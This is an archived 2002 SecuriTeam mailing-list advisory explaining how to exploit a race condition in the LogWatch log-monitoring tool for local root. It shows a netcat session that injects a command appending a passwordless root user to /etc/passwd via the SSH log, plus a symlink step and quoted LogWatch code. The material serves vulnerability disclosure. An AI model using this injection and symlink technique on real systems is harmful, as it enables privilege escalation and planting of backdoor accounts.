[EXPL] Exploiting the Race Conditions in LogWatch
From: support@securiteam.comDate: 04/09/02
- Previous message: support@securiteam.com: "[NEWS] Unauthorized Remote Control Access to Systems Running Funk Software's Proxy"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Tue, 9 Apr 2002 00:08:38 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Exploiting the Race Conditions in LogWatch
------------------------------------------------------------------------
SUMMARY
LogWatch is a customizable, pluggable log-monitoring system. It will go
through your logs for a given period and make a report in the areas that
you wish with the detail that you wish. Easy to use - works right out of
the package on almost all systems. A race condition in the product can be
used by local attackers to gain root privileges. The following is an
explanation on how to exploit the vulnerability through the SSH daemon
(and FTPd).
DETAILS
Here are some ideas about exploiting the race condition in LogWatch.
First, we need a way to smuggle in a command in to /var/log/secure, this
is how we can do it:
$ nc 0 22
SSH-1.99-OpenSSH_2.9p2
'& echo hoho::0:0:>>/etc/passwd #
Protocol mismatch.
$ tail -f /var/log/secure
Apr 8 04:37:33 xxxxx sshd[23420]: Bad protocol version identification ''&
echo hoho::0:0:@>>/etc/passwd #' from 127.0.0.1
Ok, now we got a the command we want, how are we going to get this
executed?
----- This is what logwatch does.
Preprocessing LogFile: secure /bin/cat /var/log/secure 2>/dev/null |
/etc/log.d/scripts/shared/applystddate >/tmp/logwatch.2318/secure
DEBUG: Inside ApplyStdDate...
DEBUG: Range: yesterday
DEBUG: Looking For: Apr 6
(The command string should be inserted the day BEFORE, if range is
yesteday...)
So, if we create a symbolic link:
ln -s /etc/log.d/scripts/shared/applystddate secure
For example, the command will be executed when logwatch calls applystddate
next time (many other targets exist, for example /root/.bashrc etc).
We can of course use other logs than secure; for example "messages" and
smuggle in the command using the FTPd.
So, what are the problems?:
[code from LogWatch]
$TempDir = $Config{'tmpdir'} . "logwatch." . $$ . "/";
if ( -d $TempDir ) {
rmdir ($TempDir);
}
if ( -e $TempDir ) {
unlink ($TempDir);
}
#### 1
if ($Config{'debug'}>7) {
print "\nMaking Temp Dir: " . $TempDir . "\n";
}
mkdir ($TempDir,0700);
[code from LogWatch]
We need to create the directory logwatch.PID before "mkdir
($TempDir,0700);" and after/before #### 1. If not we will not be able to
create a symbolic link inside the directory (0700).
Another nice thing is that we can see when LogWatch will be executed, by
looking at /etc/crontab - logwatch is in the dir /etc/cron.daily.
(02 4 * * * root run-parts /etc/cron.daily)
ADDITIONAL INFORMATION
The information has been provided by <mailto:an0nym0uz@dbzmail.com> ano
nym.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Unauthorized Remote Control Access to Systems Running Funk Software's Proxy"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
